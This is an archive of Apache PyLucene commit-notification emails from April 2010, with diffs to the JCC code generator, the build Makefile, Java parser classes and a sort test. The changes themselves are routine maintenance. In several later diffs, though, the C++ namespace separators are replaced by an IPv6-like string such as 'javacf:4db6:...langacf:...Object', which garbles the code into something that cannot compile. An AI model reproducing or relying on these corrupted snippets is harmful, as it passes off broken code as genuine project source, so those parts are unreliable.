05:20:01 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 05:20:01 +0000 X-ASF-Spam-Status: No, hits=-1303.9 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 05:20:00 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1F9C62388900; Tue, 6 Apr 2010 05:19:40 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r931022 - in /lucene/pylucene/trunk/jcc: CHANGES jcc/python.py jcc/sources/functions.cpp Date: Tue, 06 Apr 2010 05:19:40 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Tue Apr 6 05:19:39 2010 New Revision: 931022 URL: http://svn.apache.org/viewvc?rev=931022&view=rev Log: 'O' not only for generics Modified: lucene/pylucene/trunk/jcc/CHANGES lucene/pylucene/trunk/jcc/jcc/python.py lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp Modified: lucene/pylucene/trunk/jcc/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/CHANGES?rev=931022&r1=931021&r2=931022&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/CHANGES (original) +++ lucene/pylucene/trunk/jcc/CHANGES Tue Apr 6 05:19:39 2010 @@ -11,7 +11,7 @@ Version 2.5 -> - added support for of_() method to set instance type parameters - fixed bug with not heeding type parameter for --sequence get method - parameterized return values are now unboxed - - improved auto-boxing of primitive type parameters into their class + - improved auto-boxing of primitive type parameters - Version 2.4 -> 2.5 Modified: lucene/pylucene/trunk/jcc/jcc/python.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/python.py?rev=931022&r1=931021&r2=931022&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/python.py (original) +++ lucene/pylucene/trunk/jcc/jcc/python.py Tue Apr 6 05:19:39 2010 @@ -147,13 +147,13 @@ def parseArgs(params, current, generics, if genericParams: sig = ''.join([signature(param, genericParam) for param, genericParam in izip(params, genericParams)]) - check = ''.join([checkarg(param, genericParam) - for param, genericParam in izip(params, genericParams)]) + chk = ''.join([checkarg(param, genericParam) + for param, genericParam in izip(params, genericParams)]) else: sig = ''.join([signature(param) for param in params]) - check = ''.join([checkarg(param) for param in params]) + chk = ''.join([checkarg(param) for param in params]) - return (sig, check, + return (sig, chk, ''.join([callarg(params[i], i) for i in xrange(len(params))])) Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp?rev=931022&r1=931021&r2=931022&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp Tue Apr 6 05:19:39 2010 @@ -91,7 +91,6 @@ PyObject *findClass(PyObject *self, PyOb Py_RETURN_NONE; } -#ifdef _java_generics static boxfn get_boxfn(PyTypeObject *type) { static PyObject *boxfn_ = PyString_FromString("boxfn_"); @@ -106,7 +105,6 @@ static boxfn get_boxfn(PyTypeObject *typ return fn; } -#endif static int is_instance_of(PyObject *arg, PyTypeObject *type) { @@ -537,7 +535,6 @@ int _parseArgs(PyObject **args, unsigned case 'o': /* java.lang.Object */ break; -#ifdef _java_generics case 'O': /* java.lang.Object with type param */ { PyTypeObject *type = va_arg(list, PyTypeObject *); @@ -551,7 +548,7 @@ int _parseArgs(PyObject **args, unsigned } break; } -#endif + case 'T': /* tuple of python types with wrapfn_ */ { static PyObject *wrapfn_ = PyString_FromString("wrapfn_"); @@ -899,9 +896,7 @@ int _parseArgs(PyObject **args, unsigned } case 'o': /* java.lang.Object */ -#ifdef _java_generics case 'O': /* java.lang.Object with type param */ -#endif { if (array) { @@ -919,7 +914,6 @@ int _parseArgs(PyObject **args, unsigned { Object *obj = va_arg(list, Object *); -#ifdef _java_generics if (types[pos] == 'O') { PyTypeObject *type = va_arg(check, PyTypeObject *); @@ -934,7 +928,7 @@ int _parseArgs(PyObject **args, unsigned break; } } -#endif + if (boxObject(NULL, arg, obj) < 0) return -1; } From [email protected] Tue Apr 06 05:21:42 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99616 invoked from network); 6 Apr 2010 05:21:42 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Apr 2010 05:21:42 -0000 Received: (qmail 6877 invoked by uid 500); 6 Apr 2010 05:21:41 -0000 Delivered-To: [email protected] Received: (qmail 6861 invoked by uid 500); 6 Apr 2010 05:21:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6853 invoked by uid 99); 6 Apr 2010 05:21:41 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 05:21:41 +0000 X-ASF-Spam-Status: No, hits=-1324.3 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 05:21:40 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 550612388900; Tue, 6 Apr 2010 05:21:20 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r931023 - /lucene/pylucene/trunk/Makefile Date: Tue, 06 Apr 2010 05:21:20 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Tue Apr 6 05:21:20 2010 New Revision: 931023 URL: http://svn.apache.org/viewvc?rev=931023&view=rev Log: - increased NUM_FILES to 3 - added wrapping of AbstractList as a python sequence Modified: lucene/pylucene/trunk/Makefile Modified: lucene/pylucene/trunk/Makefile URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/Makefile?rev=931023&r1=931022&r2=931023&view=diff ============================================================================== --- lucene/pylucene/trunk/Makefile (original) +++ lucene/pylucene/trunk/Makefile Tue Apr 6 05:21:20 2010 @@ -46,70 +46,70 @@ LUCENE=lucene-java-$(LUCENE_VER) #ANT=ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) -m jcc.__main__ --shared --arch x86_64 -#NUM_FILES=2 +#NUM_FILES=3 # Mac OS X 10.6 (MacPorts 1.8.0 64-bit Python 2.6, Java 1.6) #PREFIX_PYTHON=/opt/local #ANT=ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) -m jcc.__main__ --shared --arch x86_64 -#NUM_FILES=2 +#NUM_FILES=3 # Mac OS X 10.6 (64-bit and 32-bit Python 2.6 together, Java 1.6) #PREFIX_PYTHON=/usr #ANT=ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) -m jcc.__main__ --shared --arch x86_64 --arch i386 -#NUM_FILES=2 +#NUM_FILES=3 # Mac OS X 10.5 (32-bit Python 2.5, Java 1.5) #PREFIX_PYTHON=/usr #ANT=ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) -m jcc --shared -#NUM_FILES=2 +#NUM_FILES=3 # Mac OS X (Python 2.3.5, Java 1.5, setuptools 0.6c7, Intel Mac OS X 10.4) #PREFIX_PYTHON=/usr #ANT=ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) /System/Library/Frameworks/Python.framework/Versions/2.3/lib/python2.3/site-packages/JCC-2.3-py2.3-macosx-10.4-i386.egg/jcc/__init__.py -#NUM_FILES=2 +#NUM_FILES=3 # Mac OS X (Python 2.3.5, Java 1.5, setuptools 0.6c7, PPC Mac OS X 10.4) #PREFIX_PYTHON=/usr #ANT=ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) /System/Library/Frameworks/Python.framework/Versions/2.3/lib/python2.3/site-packages/JCC-2.3-py2.3-macosx-10.4-ppc.egg/jcc/__init__.py -#NUM_FILES=2 +#NUM_FILES=3 # Linux (Ubuntu 6.06, Python 2.4, Java 1.5, no setuptools) #PREFIX_PYTHON=/usr #ANT=ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) $(PREFIX_PYTHON)/lib/python2.4/site-packages/jcc/__init__.py -#NUM_FILES=2 +#NUM_FILES=3 # Linux (Ubuntu 8.10 64-bit, Python 2.5.2, OpenJDK 1.6, setuptools 0.6c9) #PREFIX_PYTHON=/usr #ANT=ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) -m jcc --shared -#NUM_FILES=2 +#NUM_FILES=3 # FreeBSD #PREFIX_PYTHON=/usr #ANT=ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) -m jcc -#NUM_FILES=2 +#NUM_FILES=3 # Solaris (Solaris 11, Python 2.4 32-bit, Sun Studio 12, Java 1.6) #PREFIX_PYTHON=/usr #ANT=/usr/local/apache-ant-1.7.0/bin/ant #PYTHON=$(PREFIX_PYTHON)/bin/python #JCC=$(PYTHON) $(PREFIX_PYTHON)/lib/python2.4/site-packages/jcc/__init__.py -#NUM_FILES=2 +#NUM_FILES=3 # Windows (Win32, Python 2.5.1, Java 1.6, ant 1.7.0) #PREFIX_PYTHON=/cygdrive/o/Python-2.5.2/PCbuild @@ -215,6 +215,7 @@ GENERATE=$(JCC) $(foreach jar,$(JARS),-- --python lucene \ --mapping org.apache.lucene.document.Document 'get:(Ljava/lang/String;)Ljava/lang/String;' \ --mapping java.util.Properties 'getProperty:(Ljava/lang/String;)Ljava/lang/String;' \ + --sequence java.util.AbstractList 'size:()I' 'get:(I)Ljava/lang/Object;' \ --rename org.apache.lucene.search.highlight.SpanScorer=HighlighterSpanScorer \ --version $(LUCENE_VER) \ --module python/collections.py \ From [email protected] Tue Apr 06 19:51:55 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11302 invoked from network); 6 Apr 2010 19:51:55 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Apr 2010 19:51:55 -0000 Received: (qmail 91775 invoked by uid 500); 6 Apr 2010 19:51:55 -0000 Delivered-To: [email protected] Received: (qmail 91756 invoked by uid 500); 6 Apr 2010 19:51:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91748 invoked by uid 99); 6 Apr 2010 19:51:54 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 19:51:54 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 19:51:51 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id CE76E2388994; Tue, 6 Apr 2010 19:51:29 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r931296 - in /lucene/pylucene/trunk: ./ java/org/apache/pylucene/search/ jcc/jcc/ jcc/jcc/sources/ test/ Date: Tue, 06 Apr 2010 19:51:29 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Tue Apr 6 19:51:29 2010 New Revision: 931296 URL: http://svn.apache.org/viewvc?rev=931296&view=rev Log: adapted to latest changes in Lucene trunk Modified: lucene/pylucene/trunk/Makefile lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonByteParser.java lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonDoubleParser.java lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonFloatParser.java lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonIntParser.java lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonLongParser.java lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonShortParser.java lucene/pylucene/trunk/jcc/jcc/python.py lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp lucene/pylucene/trunk/jcc/jcc/sources/functions.h lucene/pylucene/trunk/test/test_Sort.py Modified: lucene/pylucene/trunk/Makefile URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/Makefile?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/Makefile (original) +++ lucene/pylucene/trunk/Makefile Tue Apr 6 19:51:29 2010 @@ -140,7 +140,6 @@ LUCENE_JAR=$(LUCENE)/build/lucene-core-$ ANALYZERS_JAR=$(LUCENE)/build/contrib/analyzers/common/lucene-analyzers-$(LUCENE_VER).jar HIGHLIGHTER_JAR=$(LUCENE)/build/contrib/highlighter/lucene-highlighter-$(LUCENE_VER).jar MEMORY_JAR=$(LUCENE)/build/contrib/memory/lucene-memory-$(LUCENE_VER).jar -REGEX_JAR=$(LUCENE)/build/contrib/regex/lucene-regex-$(LUCENE_VER).jar QUERIES_JAR=$(LUCENE)/build/contrib/queries/lucene-queries-$(LUCENE_VER).jar EXTENSIONS_JAR=build/jar/extensions.jar @@ -173,9 +172,6 @@ $(LUCENE_JAR): $(LUCENE) $(ANALYZERS_JAR): $(LUCENE_JAR) cd $(LUCENE)/contrib/analyzers/common; $(ANT) -Dversion=$(LUCENE_VER) -$(REGEX_JAR): $(LUCENE_JAR) - cd $(LUCENE)/contrib/regex; $(ANT) -Dversion=$(LUCENE_VER) - $(MEMORY_JAR): $(LUCENE_JAR) cd $(LUCENE)/contrib/memory; $(ANT) -Dversion=$(LUCENE_VER) @@ -189,7 +185,7 @@ $(EXTENSIONS_JAR): $(LUCENE_JAR) $(ANT) -f extensions.xml -Dlucene.dir=$(LUCENE) JARS=$(LUCENE_JAR) $(ANALYZERS_JAR) \ - $(REGEX_JAR) $(MEMORY_JAR) $(HIGHLIGHTER_JAR) $(QUERIES_JAR) \ + $(MEMORY_JAR) $(HIGHLIGHTER_JAR) $(QUERIES_JAR) \ $(EXTENSIONS_JAR) Modified: lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonByteParser.java URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonByteParser.java?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonByteParser.java (original) +++ lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonByteParser.java Tue Apr 6 19:51:29 2010 @@ -16,6 +16,7 @@ package org.apache.pylucene.search; import org.apache.lucene.search.FieldCache; +import org.apache.lucene.util.BytesRef; /** * @author Andi Vajda @@ -45,5 +46,5 @@ public class PythonByteParser implements } public native void pythonDecRef(); - public native byte parseByte(String string); + public native byte parseByte(BytesRef ref); } Modified: lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonDoubleParser.java URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonDoubleParser.java?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonDoubleParser.java (original) +++ lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonDoubleParser.java Tue Apr 6 19:51:29 2010 @@ -16,6 +16,7 @@ package org.apache.pylucene.search; import org.apache.lucene.search.FieldCache; +import org.apache.lucene.util.BytesRef; /** * @author Andi Vajda @@ -45,5 +46,5 @@ public class PythonDoubleParser implemen } public native void pythonDecRef(); - public native double parseDouble(String string); + public native double parseDouble(BytesRef ref); } Modified: lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonFloatParser.java URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonFloatParser.java?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonFloatParser.java (original) +++ lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonFloatParser.java Tue Apr 6 19:51:29 2010 @@ -16,6 +16,7 @@ package org.apache.pylucene.search; import org.apache.lucene.search.FieldCache; +import org.apache.lucene.util.BytesRef; /** * @author Andi Vajda @@ -45,5 +46,5 @@ public class PythonFloatParser implement } public native void pythonDecRef(); - public native float parseFloat(String string); + public native float parseFloat(BytesRef ref); } Modified: lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonIntParser.java URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonIntParser.java?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonIntParser.java (original) +++ lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonIntParser.java Tue Apr 6 19:51:29 2010 @@ -16,6 +16,7 @@ package org.apache.pylucene.search; import org.apache.lucene.search.FieldCache; +import org.apache.lucene.util.BytesRef; /** * @author Andi Vajda @@ -45,5 +46,5 @@ public class PythonIntParser implements } public native void pythonDecRef(); - public native int parseInt(String string); + public native int parseInt(BytesRef ref); } Modified: lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonLongParser.java URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonLongParser.java?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonLongParser.java (original) +++ lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonLongParser.java Tue Apr 6 19:51:29 2010 @@ -16,6 +16,7 @@ package org.apache.pylucene.search; import org.apache.lucene.search.FieldCache; +import org.apache.lucene.util.BytesRef; /** * @author Andi Vajda @@ -45,5 +46,5 @@ public class PythonLongParser implements } public native void pythonDecRef(); - public native long parseLong(String string); + public native long parseLong(BytesRef ref); } Modified: lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonShortParser.java URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonShortParser.java?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonShortParser.java (original) +++ lucene/pylucene/trunk/java/org/apache/pylucene/search/PythonShortParser.java Tue Apr 6 19:51:29 2010 @@ -16,6 +16,7 @@ package org.apache.pylucene.search; import org.apache.lucene.search.FieldCache; +import org.apache.lucene.util.BytesRef; /** * @author Andi Vajda @@ -45,5 +46,5 @@ public class PythonShortParser implement } public native void pythonDecRef(); - public native short parseShort(String string); + public native short parseShort(BytesRef ref); } Modified: lucene/pylucene/trunk/jcc/jcc/python.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/python.py?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/python.py (original) +++ lucene/pylucene/trunk/jcc/jcc/python.py Tue Apr 6 19:51:29 2010 @@ -54,7 +54,7 @@ CALLARGS = { 'boolean': ('O', '(%s ? Py_ BOXED = set(('java.lang.Boolean', 'java.lang.Byte', - 'java.lang.Char', + 'java.lang.Character', 'java.lang.Double', 'java.lang.Float', 'java.lang.Integer', Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp Tue Apr 6 19:51:29 2010 @@ -1345,7 +1345,7 @@ PyObject *unboxByte(const jobject &obj) Py_RETURN_NONE; } -PyObject *unboxChar(const jobject &obj) +PyObject *unboxCharacter(const jobject &obj) { if (obj != NULL) { Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.h?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.h (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.h Tue Apr 6 19:51:29 2010 @@ -74,7 +74,7 @@ PyObject *wrapType(PyTypeObject *type, c PyObject *unboxBoolean(const jobject& obj); PyObject *unboxByte(const jobject& obj); -PyObject *unboxChar(const jobject& obj); +PyObject *unboxCharacter(const jobject& obj); PyObject *unboxDouble(const jobject& obj); PyObject *unboxFloat(const jobject& obj); PyObject *unboxInteger(const jobject& obj); Modified: lucene/pylucene/trunk/test/test_Sort.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/test/test_Sort.py?rev=931296&r1=931295&r2=931296&view=diff ============================================================================== --- lucene/pylucene/trunk/test/test_Sort.py (original) +++ lucene/pylucene/trunk/test/test_Sort.py Tue Apr 6 19:51:29 2010 @@ -297,27 +297,27 @@ class SortTestCase(TestCase): class intParser(PythonIntParser): def parseInt(_self, val): - return (ord(val[0]) - ord('A')) * 123456 + return (val.bytes[0] - ord('A')) * 123456 class floatParser(PythonFloatParser): def parseFloat(_self, val): - return math.sqrt(ord(val[0])) + return math.sqrt(val.bytes[0]) class longParser(PythonLongParser): def parseLong(_self, val): - return (ord(val[0]) - ord('A')) * 1234567890L + return (val.bytes[0] - ord('A')) * 1234567890L class doubleParser(PythonDoubleParser): def parseDouble(_self, val): - return math.pow(ord(val[0]), ord(val[0]) - ord('A')) + return math.pow(val.bytes[0], val.bytes[0] - ord('A')) class byteParser(PythonByteParser): def parseByte(_self, val): - return chr(ord(val[0]) - ord('A')) + return chr(val.bytes[0] - ord('A')) class shortParser(PythonShortParser): def parseShort(_self, val): - return ord(val[0]) - ord('A') + return val.bytes[0] - ord('A') sort = Sort() sort.setSort([SortField("parser", intParser()), @@ -1003,7 +1003,7 @@ class MyFieldComparator(PythonFieldCompa class intParser(PythonIntParser): def parseInt(_self, val): - return (ord(val[0]) - ord('A')) * 123456 + return (val.bytes[0] - ord('A')) * 123456 self.docValues = FieldCache.DEFAULT.getInts(reader, "parser", intParser()) From [email protected] Tue Apr 06 20:07:56 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16137 invoked from network); 6 Apr 2010 20:07:55 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Apr 2010 20:07:55 -0000 Received: (qmail 15700 invoked by uid 500); 6 Apr 2010 20:07:55 -0000 Delivered-To: [email protected] Received: (qmail 15666 invoked by uid 500); 6 Apr 2010 20:07:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15571 invoked by uid 99); 6 Apr 2010 20:07:55 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 20:07:55 +0000 X-ASF-Spam-Status: No, hits=-1343.6 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 06 Apr 2010 20:07:54 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DBA0C238896F; Tue, 6 Apr 2010 20:07:33 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r931300 - in /lucene/pylucene/trunk/jcc: CHANGES jcc/python.py jcc/sources/functions.cpp jcc/sources/functions.h Date: Tue, 06 Apr 2010 20:07:33 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Tue Apr 6 20:07:33 2010 New Revision: 931300 URL: http://svn.apache.org/viewvc?rev=931300&view=rev Log: - added support for auto-boxing CharSequence from python strings Modified: lucene/pylucene/trunk/jcc/CHANGES lucene/pylucene/trunk/jcc/jcc/python.py lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp lucene/pylucene/trunk/jcc/jcc/sources/functions.h Modified: lucene/pylucene/trunk/jcc/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/CHANGES?rev=931300&r1=931299&r2=931300&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/CHANGES (original) +++ lucene/pylucene/trunk/jcc/CHANGES Tue Apr 6 20:07:33 2010 @@ -12,6 +12,7 @@ Version 2.5 -> - fixed bug with not heeding type parameter for --sequence get method - parameterized return values are now unboxed - improved auto-boxing of primitive type parameters + - added support for auto-boxing CharSequence from python strings - Version 2.4 -> 2.5 Modified: lucene/pylucene/trunk/jcc/jcc/python.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/python.py?rev=931300&r1=931299&r2=931300&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/python.py (original) +++ lucene/pylucene/trunk/jcc/jcc/python.py Tue Apr 6 20:07:33 2010 @@ -52,15 +52,23 @@ CALLARGS = { 'boolean': ('O', '(%s ? Py_ 'short': ('i', '(int) %s', False), 'java.lang.String': ('O', 'env->fromJString((jstring) %s, 0)', True) } -BOXED = set(('java.lang.Boolean', - 'java.lang.Byte', - 'java.lang.Character', - 'java.lang.Double', - 'java.lang.Float', - 'java.lang.Integer', - 'java.lang.Long', - 'java.lang.Short', - 'java.lang.String')) +BOXED = { 'java.lang.Boolean': (True, True), + 'java.lang.Byte': (True, True), + 'java.lang.Character': (True, True), + 'java.lang.CharSequence': (True, False), + 'java.lang.Double': (True, True), + 'java.lang.Float': (True, True), + 'java.lang.Integer': (True, True), + 'java.lang.Long': (True, True), + 'java.lang.Short': (True, True), + 'java.lang.String': (True, True) } + + +def is_boxed(clsName): + return BOXED.get(clsName, (False, False))[0] + +def is_unboxed(clsName): + return BOXED.get(clsName, (False, False))[1] def getTypeParameters(cls): @@ -107,7 +115,7 @@ def parseArgs(params, current, generics, return array + 's' if clsName == 'java.lang.Object': return array + 'o' - if clsName in BOXED: + if is_boxed(clsName): return array + 'O' if generics and getTypeParameters(cls): return array + 'K' @@ -130,7 +138,7 @@ def parseArgs(params, current, generics, if (cls.isPrimitive() or clsName in ('java.lang.String', 'java.lang.Object')): return '' - if clsName in BOXED: + if is_boxed(clsName): clsNames = clsName.split('.') return ', &%sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b%s$$Type' %('acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b'.join(cppnames(clsNames[:-1])), cppname(clsNames[-1])) return ', %sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass' %(typename(cls, current, False)) @@ -1015,7 +1023,7 @@ def python(env, out_h, out, cls, superCl line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "class_", make_descriptor(%sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass, %s));', names[-1], cppname(names[-1]), generics and 1 or 0) - if cls.getName() in BOXED: + if is_unboxed(cls.getName()): wrapfn_ = "unbox%s" %(names[-1]) boxfn_ = "box%s" %(names[-1]) else: Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp?rev=931300&r1=931299&r2=931300&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp Tue Apr 6 20:07:33 2010 @@ -1610,6 +1610,28 @@ int boxCharacter(PyTypeObject *type, PyO return 0; } +int boxCharSequence(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyString_Check(arg) || PyUnicode_Check(arg)) + { + if (obj != NULL) + { + *obj = p2j(arg); + if (PyErr_Occurred()) + return -1; + } + } + else + return -1; + + return 0; +} + int boxDouble(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) { int result = boxJObject(type, arg, obj); Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.h?rev=931300&r1=931299&r2=931300&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.h (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.h Tue Apr 6 20:07:33 2010 @@ -85,6 +85,7 @@ PyObject *unboxString(const jobject& obj int boxBoolean(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); int 